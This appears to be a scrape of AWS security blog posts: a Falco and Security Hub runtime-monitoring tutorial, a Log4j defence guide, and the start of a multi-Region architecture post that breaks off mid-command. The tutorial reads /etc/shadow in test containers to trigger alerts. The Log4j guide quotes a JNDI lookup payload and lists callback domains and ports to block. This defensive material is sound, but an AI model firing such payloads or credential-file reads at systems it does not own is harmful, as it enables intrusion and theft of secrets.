Kris is a Senior Security Consultant with AWS Professional Services. He partners with Chief Information Security Officers to lead their digital transformation efforts on AWS. When not working on security and compliance initiatives with customers, Kris enjoys traveling, hiking, and spending time with his family. He is also a veteran of the U.S. Air Force.

Cory Smith

Cory is a Senior Security Consultant with AWS Professional Services based in San Antonio, TX. He partners with customers to deliver key business outcomes in a secure and compliant manner within AWS. He’s passionate about solving complex technical problems with new and innovative solutions.

Kafayat Adeyemi

Kafayat is a Senior Technical Account Manager at AWS based in Atlanta, GA. She is passionate about security and works with enterprise customers to build, deploy, and manage secure and scalable workloads on AWS. Outside of work, she loves to travel, bake, and spend time with her family.

Justin Kontny

Justin is a Senior Security Consultant with the AWS Global Security Practice, a part of our Worldwide Professional Services Organization. He helps customers improve their security posture as they migrate their most sensitive workloads to AWS. Justin has a passion for detective controls and scaling security via automation.

Continuous runtime security monitoring with AWS Security Hub and Falco

Post Syndicated from Rajarshi Das original https://aws.amazon.com/blogs/security/continuous-runtime-security-monitoring-with-aws-security-hub-and-falco/

Customers want a single and comprehensive view of the security posture of their workloads. Runtime security event monitoring is important to building secure, operationally excellent, and reliable workloads, especially in environments that run containers and container orchestration platforms. In this blog post, we show you how to use services such as AWS Security Hub and Falco, a Cloud Native Computing Foundation project, to build a continuous runtime security monitoring solution.

With the solution in place, you can collect runtime security findings from multiple AWS accounts running one or more workloads on AWS container orchestration platforms, such as Amazon Elastic Kubernetes Service (Amazon EKS) or Amazon Elastic Container Service (Amazon ECS). The solution collates the findings across those accounts into a designated account where you can view the security posture across accounts and workloads.


Solution overview

Security Hub collects security findings from other AWS services using the standardized AWS Security Finding Format (ASFF). Falco provides the ability to detect security events at runtime for containers. Partner integrations like Falco are also available in Security Hub and use the ASFF. Security Hub provides a custom integrations feature using the ASFF to enable collection and aggregation of findings that are generated by custom security products.

The solution in this blog post uses AWS FireLens, Amazon CloudWatch Logs, and AWS Lambda to enrich logs from Falco and populate Security Hub.
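To give a feel for that transformation, the following is a heavily simplified sketch of a CloudWatch Logs-triggered Lambda handler that converts Falco's JSON alerts into ASFF findings and imports them. The actual transformation lives in the aws-securityhub-falco-ecs-eks-integration repository used in the deployment section below, and the severity mapping and resource extraction here are illustrative assumptions:

import base64
import gzip
import json
from datetime import datetime, timezone

import boto3

securityhub = boto3.client("securityhub")

def handler(event, context):
    # CloudWatch Logs delivers a base64-encoded, gzipped payload.
    payload = json.loads(gzip.decompress(base64.b64decode(event["awslogs"]["data"])))
    now = datetime.now(timezone.utc).isoformat()
    region = context.invoked_function_arn.split(":")[3]
    account_id = context.invoked_function_arn.split(":")[4]

    findings = []
    for log_event in payload["logEvents"]:
        alert = json.loads(log_event["message"])  # Falco emits JSON alerts
        findings.append({
            "SchemaVersion": "2018-10-08",
            "Id": log_event["id"],
            "ProductArn": f"arn:aws:securityhub:{region}:{account_id}:product/{account_id}/default",
            "GeneratorId": "falco",
            "AwsAccountId": account_id,
            "Types": ["Unusual Behaviors"],
            "CreatedAt": now,
            "UpdatedAt": now,
            "Severity": {"Label": "HIGH"},  # illustrative; map Falco priority in practice
            "Title": alert.get("rule", "Falco alert"),
            "Description": alert.get("output", "")[:1024],
            "Resources": [{
                "Type": "Container",
                "Id": alert.get("output_fields", {}).get("container.id", "unknown"),
            }],
        })
    if findings:  # BatchImportFindings accepts up to 100 findings per call
        securityhub.batch_import_findings(Findings=findings)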

Figure 1: Architecture diagram of continuous runtime security monitoring

Here’s how the solution works, as shown in Figure 1:

  1. An AWS account is running a workload on Amazon EKS.
    1. Runtime security events detected by Falco for that workload are sent to CloudWatch Logs using AWS FireLens.
    2. CloudWatch Logs acts as the destination for FireLens and a trigger for the Lambda function in the next step.
    3. The Lambda function transforms the logs into the ASFF. These findings can now be imported into Security Hub.
    4. The Security Hub instance that is running in the same account as the workload running on Amazon EKS stores and processes the findings provided by Lambda and provides the security posture to users of the account. This instance also acts as a member account for Security Hub.
  2. Another AWS account is running a workload on Amazon ECS.
    1. Runtime security events detected by Falco for that workload are sent to CloudWatch Logs using AWS FireLens.
    2. CloudWatch Logs acts as the destination for FireLens and a trigger for the Lambda function in the next step.
    3. The Lambda function transforms the logs into the ASFF. These findings can now be imported into Security Hub.
    4. The Security Hub instance that is running in the same account as the workload running on Amazon ECS stores and processes the findings provided by Lambda and provides the security posture to users of the account. This instance also acts as another member account for Security Hub.
  3. The designated Security Hub administrator account combines the findings generated by the two member accounts, and then provides a comprehensive view of security alerts and security posture across AWS accounts. If your workloads span multiple Regions, Security Hub supports aggregating findings across Regions.


Prerequisites

For this walkthrough, you should have the following in place:

  1. Three AWS accounts.

    Note: We recommend three accounts so you can experience Security Hub’s support for a multi-account setup. However, you can use a single AWS account instead to host the Amazon ECS and Amazon EKS workloads, and send findings to Security Hub in the same account. If you are using a single account, skip the following account specific-guidance. If you are integrated with AWS Organizations, the designated Security Hub administrator account will automatically have access to the member accounts.

  2. Security Hub set up with an administrator account on one account.
  3. Security Hub set up with member accounts on two accounts: one account to host the Amazon EKS workload, and one account to host the Amazon ECS workload.
  4. Falco set up on the Amazon EKS and Amazon ECS clusters, with logs routed to CloudWatch Logs using FireLens.

    Important: Take note of the names of the CloudWatch Logs groups, as you will need them in the next section.

  5. AWS Cloud Development Kit (CDK) installed on the member accounts to deploy the solution that provides the custom integration between Falco and Security Hub.


Deploying the solution

In this section, you will learn how to deploy the solution and enable the CloudWatch Logs group. Enabling the CloudWatch Logs group is the trigger for running the Lambda function in both member accounts.

To deploy this solution in your own account

  1. Clone the aws-securityhub-falco-ecs-eks-integration GitHub repository by running the following command.
    $ git clone https://github.com/aws-samples/aws-securityhub-falco-ecs-eks-integration
  2. Follow the instructions in the README file provided on GitHub to build and deploy the solution. Make sure that you deploy the solution to the accounts hosting the Amazon EKS and Amazon ECS clusters.
  3. Navigate to the AWS Lambda console and confirm that you see the newly created Lambda function. You will use this function in the next section.
Figure 2: Lambda function for Falco integration with Security Hub

To enable the CloudWatch Logs group

  1. In the AWS Management Console, select the Lambda function shown in Figure 2—AwsSecurityhubFalcoEcsEksln-lambdafunction—and then, on the Function overview screen, select + Add trigger.
  2. On the Add trigger screen, provide the following information and then select Add, as shown in Figure 3.
    • Trigger configuration – From the drop-down, select CloudWatch logs.
    • Log group – Choose the Log group you noted in Step 4 of the Prerequisites. In our setup, the log group for the Amazon ECS and Amazon EKS clusters, deployed in separate AWS accounts, was set with the same value (falco).
    • Filter name – Provide a name for the filter. In our example, we used the name falco.
    • Filter pattern – optional – Leave this field blank.
    Figure 3: Lambda function trigger – CloudWatch Log group

  3. Repeat these steps (as applicable) to set up the trigger for the Lambda function deployed in other accounts.


Testing the deployment

Now that you’ve deployed the solution, you will verify that it’s working.

With the default rules, Falco generates alerts for activities such as:

  • An attempt to write to a file below the /etc folder. The /etc folder contains important system configuration files.
  • An attempt to open a sensitive file (such as /etc/shadow) for reading.

To test your deployment, you will attempt to perform these activities to generate Falco alerts that are reported as Security Hub findings in the same account. Then you will review the findings.

To test the deployment in member account 1

  1. Run the following commands to trigger an alert in member account 1, which is running an Amazon EKS cluster. Replace <container_name> with your own value.
    kubectl exec -it <container_name> /bin/bash
    touch /etc/5
    cat /etc/shadow > /dev/null
  2. To see the list of findings, log in to your Security Hub admin account and navigate to Security Hub > Findings. As shown in Figure 4, you will see the alerts generated by Falco, including the Falco-generated title, and the instance where the alert was triggered.

    Figure 4: Findings in Security Hub

  3. To see more detail about a finding, check the box next to the finding. Figure 5 shows some of the details for the finding Read sensitive file untrusted.
    Figure 5: Sensitive file read finding – detail view

    Figure 6 shows the Resources section of this finding, that includes the instance ID of the Amazon EKS cluster node. In our example this is the Amazon Elastic Compute Cloud (Amazon EC2) instance.

    Figure 6: Resource Detail in Security Hub finding
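
If you prefer the CLI, the findings shown in Figures 4 through 6 can also be retrieved with aws securityhub get-findings. This is a minimal sketch; the title value matches the Falco rule name from our example.

    # Retrieve active findings whose title matches the Falco rule name.
    aws securityhub get-findings \
      --filters '{
        "Title": [{"Value": "Read sensitive file untrusted", "Comparison": "EQUALS"}],
        "RecordState": [{"Value": "ACTIVE", "Comparison": "EQUALS"}]
      }' \
      --query 'Findings[].{Title: Title, Account: AwsAccountId, Resource: Resources[0].Id}'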

To test the deployment in member account 2

  1. Run the following commands to trigger a Falco alert in member account 2, which is running an Amazon ECS cluster. Replace <container_id> with your own value.
    docker exec -it <container_id> bash
    touch /etc/5
    cat /etc/shadow > /dev/null
  2. As in the preceding example with member account 1, to view the findings related to this alert, navigate to your Security Hub admin account and select Findings.

To view the collated findings from both member accounts in Security Hub

  1. In the designated Security Hub administrator account, navigate to Security Hub > Findings. The findings from both member accounts are collated there, so you can use this centralized account to view the security posture across accounts and workloads. Figure 7 shows two findings, one from each member account, viewable in the single-pane-of-glass administrator account.

    Figure 7: Write below /etc findings in a single view

  2. To see more information and a link to the corresponding member account where the finding was generated, check the box next to the finding. Figure 8 shows the account detail associated with a specific finding in member account 1.
    Figure 8: Write under /etc detail view in Security Hub admin account

    By centralizing and enriching the findings from Falco, you can take action more quickly or perform automated remediation on the impacted resources.
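
To script this cross-account view, you can filter the same findings by member account from the CLI. A minimal sketch follows; the account ID is a placeholder.

    # List findings that originated in member account 1 (account ID is a placeholder).
    aws securityhub get-findings \
      --filters '{"AwsAccountId": [{"Value": "111122223333", "Comparison": "EQUALS"}]}' \
      --query 'Findings[].[AwsAccountId, Title, CreatedAt]' \
      --output table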

Cleaning up

To clean up this demo:

  1. Delete the CloudWatch Logs trigger from the Lambda functions that were created in the section To enable the CloudWatch Logs group.
  2. Delete the Lambda functions by deleting the CloudFormation stack that you created in the section To deploy this solution in your own account (a CLI sketch for steps 1 and 2 follows this list).
  3. Delete the Amazon EKS and Amazon ECS clusters created as part of the Prerequisites.
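
Steps 1 and 2 can also be performed from the CLI. A minimal sketch, assuming the filter and statement ID names used earlier in this post and a placeholder stack name:

    # Remove the CloudWatch Logs trigger created earlier.
    aws logs delete-subscription-filter --log-group-name falco --filter-name falco
    aws lambda remove-permission \
      --function-name AwsSecurityhubFalcoEcsEksln-lambdafunction \
      --statement-id falco-cw-logs-trigger

    # Delete the CloudFormation stack that created the Lambda function.
    aws cloudformation delete-stack --stack-name <stack-name>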

Conclusion

In this post, you learned how to achieve multi-account continuous runtime security monitoring for container-based workloads running on Amazon EKS and Amazon ECS. This is achieved by creating a custom integration between Falco and Security Hub.

You can extend this solution in a number of ways. For example:

  • You can forward findings from a single source across accounts to security information and event management (SIEM) tools such as Splunk.
  • You can perform automated remediation activities based on the findings generated, using Lambda.

To learn more about managing a centralized Security Hub administrator account, see Managing administrator and member accounts. To learn more about working with ASFF, see AWS Security Finding Format (ASFF) in the documentation. To learn more about the Falco engine and rule structure, see the Falco documentation.

If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security news? Follow us on Twitter.

Rajarshi Das

Rajarshi is a Solutions Architect at Amazon Web Services. He focuses on helping Public Sector customers accelerate their security and compliance certifications and authorizations by architecting secure and scalable solutions. Rajarshi holds four AWS certifications, including AWS Certified Solutions Architect – Professional and AWS Certified Security – Specialty.

Adam Cerini

Adam is a Senior Solutions Architect with Amazon Web Services. He focuses on helping Public Sector customers architect scalable, secure, and cost-effective systems. Adam holds five AWS certifications, including AWS Certified Solutions Architect – Professional and AWS Certified Security – Specialty.

Using AWS security services to protect against, detect, and respond to the Log4j vulnerability

Post Syndicated from Marshall Jones original https://aws.amazon.com/blogs/security/using-aws-security-services-to-protect-against-detect-and-respond-to-the-log4j-vulnerability/

January 7, 2022: The blog post has been updated to include using Network ACL rules to block potential log4j-related outbound traffic.

January 4, 2022: The blog post has been updated to suggest using WAF rules when correct HTTP Host Header FQDN value is not provided in the request.

December 31, 2021: We made a minor update to the second paragraph in the Amazon Route 53 Resolver DNS Firewall section.

December 29, 2021: A paragraph under the Detect section has been added to provide guidance on validating if log4j exists in an environment.

December 23, 2021: The GuardDuty section has been updated to describe new threat labels added to specific findings to give log4j context.

December 21, 2021: The post includes more info about Route 53 Resolver DNS query logging.

December 20, 2021: The post has been updated to include Amazon Route 53 Resolver DNS Firewall info.

December 17, 2021: The post has been updated to include using Athena to query VPC flow logs.

December 16, 2021: The Respond section of the post has been updated to include IMDSv2 and container mitigation info.

This blog post was first published on December 15, 2021.


Overview

In this post, we provide guidance to help customers who are responding to the recently disclosed log4j vulnerability. This covers what you can do to limit the risk of the vulnerability, how you can try to identify whether you are susceptible to the issue, and then what you can do to update your infrastructure with the appropriate patches.

The log4j vulnerability (CVE-2021-44228, CVE-2021-45046) is a critical vulnerability (CVSS 3.1 base score of 10.0) in the ubiquitous logging platform Apache Log4j. This vulnerability allows an attacker to perform a remote code execution on the vulnerable platform. Version 2 of log4j, between versions 2.0-beta-9 and 2.15.0, is affected.

The vulnerability uses the Java Naming and Directory Interface (JNDI), which is used by a Java program to find data, typically through a directory, commonly an LDAP directory in the case of this vulnerability.

Figure 1, below, highlights the log4j JNDI attack flow.

Figure 1. Log4j attack progression. Source: GovCERT.ch, the Computer Emergency Response Team (GovCERT) of the Swiss government

As an immediate response, follow this blog and use the tool designed to hotpatch a running JVM that uses any log4j 2.0+ version. Steve Schmidt, Chief Information Security Officer for AWS, also discussed this hotpatch.

Protect

You can use multiple AWS services to help limit your risk/exposure from the log4j vulnerability. You can build a layered control approach, and/or pick and choose the controls identified below to help limit your exposure.

AWS WAF

Use AWS Web Application Firewall, following AWS Managed Rules for AWS WAF, to help protect your Amazon CloudFront distribution, Amazon API Gateway REST API, Application Load Balancer, or AWS AppSync GraphQL API resources.

  • AWSManagedRulesKnownBadInputsRuleSet, especially the Log4JRCE rule, which helps inspect the request for the presence of the Log4j vulnerability. Example patterns include ${jndi:ldap://example.com/}.
  • AWSManagedRulesAnonymousIpList, especially the AnonymousIPList rule, which helps inspect IP addresses of sources known to anonymize client information.
  • AWSManagedRulesCommonRuleSet, especially the SizeRestrictions_BODY rule, to verify that the request body size is at most 8 KB (8,192 bytes).

You should also consider implementing WAF rules that deny access, if the correct HTTP Host Header FQDN value is not provided in the request. This can help reduce the likelihood of scanners that are scanning the internet IP address space from reaching your resources protected by WAF via a request with an incorrect Host Header, like an IP address instead of an FQDN. It’s also possible to use custom Application Load Balancer listener rules to achieve this.
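
As an illustration, one way to express such a rule is the JSON form used by the AWS WAF console's rule editor. This is a sketch, not a drop-in rule: www.example.com is a placeholder FQDN, the rule name is our own, and the priority must be adjusted to fit your web ACL.

    # Save a rule that blocks requests whose Host header is not exactly our FQDN.
    cat > block-bad-host-header.json <<'EOF'
    {
      "Name": "BlockUnexpectedHostHeader",
      "Priority": 0,
      "Statement": {
        "NotStatement": {
          "Statement": {
            "ByteMatchStatement": {
              "SearchString": "www.example.com",
              "FieldToMatch": { "SingleHeader": { "Name": "host" } },
              "TextTransformations": [ { "Priority": 0, "Type": "LOWERCASE" } ],
              "PositionalConstraint": "EXACTLY"
            }
          }
        }
      },
      "Action": { "Block": {} },
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "BlockUnexpectedHostHeader"
      }
    }
    EOF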

If you’re using AWS WAF Classic, you will need to migrate to AWS WAF or create custom regex match conditions.

Have multiple accounts? Follow these instructions to use AWS Firewall Manager to deploy AWS WAF rules centrally across your AWS organization.

Amazon Route 53 Resolver DNS Firewall

You can use Route 53 Resolver DNS Firewall, following AWS Managed Domain Lists, to help proactively protect resources with outbound public DNS resolution. We recommend associating Route 53 Resolver DNS Firewall with a rule configured to block domains on the AWSManagedDomainsMalwareDomainList, which has been updated in all supported AWS regions with domains identified as hosting malware used in conjunction with the log4j vulnerability. AWS will continue to deliver domain updates for Route 53 Resolver DNS Firewall through this list.

Also, you should consider blocking outbound port 53 to prevent the use of external untrusted DNS servers. This helps force all DNS queries through DNS Firewall and ensures DNS traffic is visible for GuardDuty inspection. Using DNS Firewall to block DNS resolution of certain country code top-level domains (ccTLDs) that your VPC resources have no legitimate reason to connect to may also help. Examples of ccTLDs you may want to block can be found in the known log4j callback domain IOCs.

We also recommend that you enable DNS query logging, which allows you to identify and audit potentially impacted resources within your VPC, by inspecting the DNS logs for the presence of blocked outbound queries due to the log4j vulnerability, or to other known malicious destinations. DNS query logging is also useful in helping identify EC2 instances vulnerable to log4j that are responding to active log4j scans, which may be originating from malicious actors or from legitimate security researchers. In either case, instances responding to these scans potentially have the log4j vulnerability and should be addressed. GreyNoise is monitoring for log4j scans and sharing the callback domains here. Some notable domains customers may want to examine log activity for, but not necessarily block, are: *interact.sh, *leakix.net, *canarytokens.com, *dnslog.cn, *.dnsbin.net, and *cyberwar.nl. It is very likely that instances resolving these domains are vulnerable to log4j.

AWS Network Firewall

Customers can use Suricata-compatible IDS/IPS rules in AWS Network Firewall to deploy network-based detection and protection. While Suricata doesn't have a protocol detector for LDAP, it is possible to detect these LDAP calls with Suricata. Open-source Suricata rules addressing Log4j are available from Corelight, NCC Group, ET Labs, and CrowdStrike. These rules can help identify scanning, as well as post-exploitation of the log4j vulnerability. Because there is a large amount of benign scanning happening now, we recommend customers focus their time first on potential post-exploitation activities, such as outbound LDAP traffic from their VPC to untrusted internet destinations.

We also recommend customers consider implementing outbound port/protocol enforcement rules that monitor or prevent instances of protocols like LDAP from using non-standard LDAP ports such as 53, 80, 123, and 443. Monitoring or preventing usage of port 1389 outbound may be particularly helpful in identifying systems that have been triggered by internet scanners to make command and control calls outbound. We also recommend that systems without a legitimate business need to initiate network calls out to the internet not be given that ability by default. Outbound network traffic filtering and monitoring is not only very helpful with log4j, but with identifying other classes of vulnerabilities too.

Network Access Control Lists

Customers may be able to use Network Access Control List rules (NACLs) to block some of the known log4j-related outbound ports to help limit further compromise of successfully exploited systems. We recommend customers consider blocking ports 1389, 1388, 1234, 12344, 9999, 8085, 1343 outbound. As NACLs block traffic at the subnet level, careful consideration should be given to ensure any new rules do not block legitimate communications using these outbound ports across internal subnets. Blocking ports 389 and 88 outbound can also be helpful in mitigating log4j, but those ports are commonly used for legitimate applications, especially in a Windows Active Directory environment. See the VPC flow logs section below to get details on how you can validate any ports being considered.
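
As a sketch, a single deny entry for outbound TCP 1389 on an existing NACL can be added with the CLI as shown below. The NACL ID is a placeholder, and the rule number must be lower than any allow rule it needs to override, since NACL rules are evaluated in ascending rule-number order.

    # Deny outbound TCP 1389 to anywhere; repeat with distinct rule numbers for other ports.
    aws ec2 create-network-acl-entry \
      --network-acl-id acl-0123456789abcdef0 \
      --rule-number 90 \
      --protocol tcp \
      --port-range From=1389,To=1389 \
      --egress \
      --rule-action deny \
      --cidr-block 0.0.0.0/0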

Use IMDSv2

Through the early days of the log4j vulnerability, researchers have noted that, once a host has been compromised with the initial JNDI vulnerability, attackers sometimes try to harvest credentials from the host and send those out via some mechanism such as LDAP, HTTP, or DNS lookups. We recommend customers use IAM roles instead of long-term access keys, and not store sensitive information such as credentials in environment variables. Customers can also leverage AWS Secrets Manager to store and automatically rotate database credentials instead of storing long-term database credentials in a host's environment variables. See prescriptive guidance here and here on how to implement Secrets Manager in your environment.

To help guard against such attacks in AWS when EC2 Roles may be in use — and to help keep all IMDS data private for that matter — customers should consider requiring the use of Instance MetaData Service version 2 (IMDSv2). Since IMDSv2 is enabled by default, you can require its use by disabling IMDSv1 (which is also enabled by default). With IMDSv2, requests are protected by an initial interaction in which the calling process must first obtain a session token with an HTTP PUT, and subsequent requests must contain the token in an HTTP header. This makes it much more difficult for attackers to harvest credentials or any other data from the IMDS. For more information about using IMDSv2, please refer to this blog and documentation. While all recent AWS SDKs and tools support IMDSv2, as with any potentially non-backwards compatible change, test this change on representative systems before deploying it broadly.
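
For an existing instance, IMDSv2 can be required with a single CLI call; the instance ID below is a placeholder.

    # Require session tokens (IMDSv2) and reject token-less IMDSv1 requests.
    aws ec2 modify-instance-metadata-options \
      --instance-id i-0123456789abcdef0 \
      --http-tokens required \
      --http-endpoint enabled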

Detect

This post has covered how to potentially limit the ability to exploit this vulnerability. Next, we’ll shift our focus to which AWS services can help to detect whether this vulnerability exists in your environment.

Figure 2. Log4j finding in the Inspector console

Amazon Inspector

As shown in Figure 2, the Amazon Inspector team has created coverage for identifying the existence of this vulnerability in your Amazon EC2 instances and Amazon Elastic Container Registry (Amazon ECR) images. With the new Amazon Inspector, scanning is automated and continual. Continual scanning is driven by events such as new software packages, new instances, and new common vulnerabilities and exposures (CVEs) being published.

For example, once the Inspector team added support for the log4j vulnerability (CVE-2021-44228 & CVE-2021-45046), Inspector immediately began looking for this vulnerability for all supported AWS Systems Manager managed instances where Log4j was installed via OS package managers and where this package was present in Maven-compatible Amazon ECR container images. If this vulnerability is present, findings will begin appearing without any manual action. If you are using Inspector Classic, you will need to ensure you are running an assessment against all of your Amazon EC2 instances. You can follow this documentation to ensure you are creating an assessment target for all of your Amazon EC2 instances. Here are further details on container scanning updates in Amazon ECR private registries.

GuardDuty

In addition to finding the presence of this vulnerability through Inspector, the Amazon GuardDuty team has also begun adding indicators of compromise associated with exploiting the Log4j vulnerability, and will continue to do so. GuardDuty will monitor for attempts to reach known-bad IP addresses or DNS entries, and can also find post-exploit activity through anomaly-based behavioral findings. For example, if an Amazon EC2 instance starts communicating on unusual ports, GuardDuty would detect this activity and create the finding Behavior:EC2/NetworkPortUnusual. This activity is not limited to the NetworkPortUnusual finding, though. GuardDuty has a number of different findings associated with post exploit activity, such as credential compromise, that might be seen in response to a compromised AWS resource. For a list of GuardDuty findings, please refer to this GuardDuty documentation.

To further help you identify and prioritize issues related to CVE-2021-44228 and CVE-2021-45046, the GuardDuty team has added threat labels to the finding detail for the following finding types:

Backdoor:EC2/C&CActivity.B
If the IP queried is Log4j-related, then the fields of the associated finding will include the following values:

  • service.additionalInfo.threatListName = Amazon
  • service.additionalInfo.threatName = Log4j Related

Backdoor:EC2/C&CActivity.B!DNS
If the domain name queried is Log4j-related, then the fields of the associated finding will include the following values:

  • service.additionalInfo.threatListName = Amazon
  • service.additionalInfo.threatName = Log4j Related

Behavior:EC2/NetworkPortUnusual
If the EC2 instance communicated on port 389 or port 1389, then the associated finding severity will be modified to High, and the finding fields will include the following value:

  • service.additionalInfo.context = Possible Log4j callback

Figure 3. GuardDuty finding with log4j threat labels
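
To surface these findings from the CLI, you can list findings by type and then inspect the threat labels on each. A minimal sketch, assuming a single detector in the current Region (the finding ID is a placeholder):

    # Look up the detector, then list findings of the DNS C&C activity type.
    DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)
    aws guardduty list-findings \
      --detector-id "$DETECTOR_ID" \
      --finding-criteria '{"Criterion": {"type": {"Eq": ["Backdoor:EC2/C&CActivity.B!DNS"]}}}'

    # Inspect the threat labels on a returned finding.
    aws guardduty get-findings \
      --detector-id "$DETECTOR_ID" \
      --finding-ids <finding-id> \
      --query 'Findings[].Service.AdditionalInfo'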

Security Hub

Many customers today also use AWS Security Hub with Inspector and GuardDuty to aggregate alerts and enable automatic remediation and response. In the short term, we recommend that you use Security Hub to set up alerting through AWS Chatbot, Amazon Simple Notification Service, or a ticketing system for visibility when Inspector finds this vulnerability in your environment. In the long term, we recommend you use Security Hub to enable automatic remediation and response for security alerts when appropriate. Here are ideas on how to set up automatic remediation and response with Security Hub.

VPC flow logs

Customers can use Athena or CloudWatch Logs Insights queries against their VPC flow logs to help identify VPC resources associated with log4j post exploitation outbound network activity. Version 5 of VPC flow logs is particularly useful, because it includes the “flow-direction” field. We recommend customers start by paying special attention to outbound network calls using destination port 1389 since outbound usage of that port is less common in legitimate applications. Customers should also investigate outbound network calls using destination ports 1388, 1234, 12344, 9999, 8085, 1343, 389, and 88 to untrusted internet destination IP addresses. Free-tier IP reputation services, such as VirusTotal, GreyNoise, NOC.org, and ipinfo.io, can provide helpful insights related to public IP addresses found in the logged activity.

Note: If you have a Microsoft Active Directory environment in the captured VPC flow logs being queried, you might see false positives due to its use of port 389.
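
For flow logs delivered to CloudWatch Logs, a query like the following can be started from the CLI. This is a sketch: the log group name is a placeholder, and the field names assume the default flow log format, which Logs Insights discovers automatically.

    # Query the last 24 hours for outbound traffic to destination port 1389.
    aws logs start-query \
      --log-group-name "/vpc/flowlogs" \
      --start-time $(($(date +%s) - 86400)) \
      --end-time $(date +%s) \
      --query-string 'fields @timestamp, srcAddr, dstAddr, dstPort, action | filter dstPort = 1389 | sort @timestamp desc | limit 100'

    # Fetch results with the queryId returned by start-query.
    aws logs get-query-results --query-id <query-id>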

Validation with open-source tools

With the evolving nature of the different log4j vulnerabilities, it’s important to validate that upgrades, patches, and mitigations in your environment are indeed working to mitigate potential exploitation of the log4j vulnerability. You can use open-source tools, such as aws_public_ips, to get a list of all your current public IP addresses for an AWS Account, and then actively scan those IPs with log4j-scan using a DNS Canary Token to get notification of which systems still have the log4j vulnerability and can be exploited. We recommend that you run this scan periodically over the next few weeks to validate that any mitigations are still in place, and no new systems are vulnerable to the log4j issue.
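
The scan loop can look roughly like the following. The flags shown are assumptions based on each tool's documentation, so verify the exact invocation against the respective READMEs.

    # Enumerate the account's public IPs, then probe one of them with log4j-scan
    # (flags are assumptions; check each project's README).
    aws_public_ips --format json > public-ips.json
    python3 log4j-scan.py -u https://<public-ip>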

Respond

The first two sections discussed ways to help prevent potential exploitation attempts and how to detect the presence of the vulnerability and potential exploitation attempts. In this section, we will focus on steps that you can take to mitigate this vulnerability. As we noted in the overview, the immediate response recommended is to follow this blog and use the tool designed to hotpatch a running JVM that uses any log4j 2.0+ version. Steve Schmidt, Chief Information Security Officer for AWS, also discussed this hotpatch.

Figure 4. Systems Manager Patch Manager patch baseline approving critical patches immediately

AWS Patch Manager

If you use AWS Systems Manager Patch Manager, and you have critical patches set to install immediately in your patch baseline, your EC2 instances will already have the patch. It is important to note that you’re not done at this point. Next, you will need to update the class path wherever the library is used in your application code, to ensure you are using the most up-to-date version. You can use AWS Patch Manager to patch managed nodes in a hybrid environment. See here for further implementation details.

Container mitigation

To install the hotpatch noted in the overview onto EKS cluster worker nodes, AWS has developed an RPM that performs a JVM-level hotpatch which disables JNDI lookups from the log4j2 library. The Apache Log4j2 node agent is an open-source project built by the Kubernetes team at AWS. To learn more about how to install this node agent, please visit this GitHub page.

Once identified, ECR container images will need to be updated to use the patched log4j version. Downstream, you will need to ensure that any containers built with a vulnerable ECR container image are updated to use the new image as soon as possible. This can vary depending on the service you are using to deploy these images. For example, if you are using Amazon Elastic Container Service (Amazon ECS), you might want to update the service to force a new deployment, which will pull down the image using the new log4j version. Check the documentation that supports the method you use to deploy containers.

If you’re running Java-based applications on Windows containers, follow Microsoft’s guidance here.

We recommend you vend new application credentials and revoke existing credentials immediately after patching.

Mitigation strategies if you can’t upgrade

In case you either can't upgrade to a patched version, which disables access to JNDI by default, or if you are still determining your strategy for how you are going to patch your environment, you can mitigate this vulnerability by changing your log4j configuration. To implement this mitigation in releases >=2.10, you will need to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
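
After removing the class, a quick check that it is really gone from the artifact can help; this sketch should print nothing if the removal succeeded.

    # Verify that JndiLookup is no longer present in the jar.
    unzip -l log4j-core-*.jar | grep JndiLookup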

For a more comprehensive list about mitigation steps for specific versions, refer to the Apache website.

Conclusion

In this blog post, we outlined key AWS security services that enable you to adopt a layered approach to help protect against, detect, and respond to your risk from the log4j vulnerability. We urge you to continue to monitor our security bulletins; we will continue updating our bulletins with our remediation efforts for our side of the shared-responsibility model.

Given the criticality of this vulnerability, we urge you to pay close attention to the vulnerability, and appropriately prioritize implementing the controls highlighted in this blog.

If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security news? Follow us on Twitter.

Marshall Jones

Marshall is a Worldwide Security Specialist Solutions Architect at AWS. His background is in AWS consulting and security architecture, focused on a variety of security domains including edge, threat detection, and compliance. Today, he is focused on helping enterprise AWS customers adopt and operationalize AWS security services to increase security effectiveness and reduce risk.

Syed Shareef

Syed is a Senior Security Solutions Architect at AWS. He works with large financial institutions to help them achieve their business goals with AWS, whilst being compliant with regulatory and security requirements.

Creating a Multi-Region Application with AWS Services – Part 1, Compute and Security

Post Syndicated from Joe Chapman original https://aws.amazon.com/blogs/architecture/creating-a-multi-region-application-with-aws-services-part-1-compute-and-security/

Building a multi-Region application requires lots of preparation and work. Many AWS services have features to help you build and manage a multi-Region architecture, but identifying those capabilities across 200+ services can be overwhelming.

In this 3-part blog series, we’ll explore AWS services with features to assist you in building multi-Region applications. In Part 1, we’ll build a foundation with AWS security, networking, and compute services. In Part 2, we’ll add in data and replication strategies. Finally, in Part 3, we’ll look at the application and management layers.

Considerations before getting started

AWS Regions are built with multiple isolated and physically separate Availability Zones (AZs). This approach allows you to create highly available Well-Architected workloads that span AZs to achieve greater fault tolerance. There are three general reasons that you may need to expand beyond a single Region:

  • Expansion to a global audience: as an application grows and its user base becomes more geographically dispersed, there can be a need to reduce latencies for different parts of the world.
  • Reducing Recovery Point Objectives (RPO) and Recovery Time Objectives (RTO) as part of a disaster recovery (DR) plan.
  • Local laws and regulations may have strict data residency and privacy requirements that must be followed.

Ensuring security, identity, and compliance

Creating a security foundation starts with proper authentication, authorization, and accounting to implement the principle of least privilege. AWS Identity and Access Management (IAM) operates in a global context by default. With IAM, you specify who can access which AWS resources and under what conditions. For workloads that use directory services, the AWS Directory Service for Microsoft Active Directory Enterprise Edition can be set up to automatically replicate directory data across Regions. This allows applications to reduce lookup latencies by using the closest directory and creates durability by spanning multiple Regions.

Applications that need to securely store, rotate, and audit secrets, such as database passwords, should use AWS Secrets Manager. It encrypts secrets with AWS Key Management Service (AWS KMS) keys and can replicate secrets to secondary Regions to ensure applications are able to obtain a secret in the closest Region.
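
For example, an existing secret can be replicated to a secondary Region with one call; the secret name and the Region below are placeholders.

    # Add a replica of the secret in us-west-2.
    aws secretsmanager replicate-secret-to-regions \
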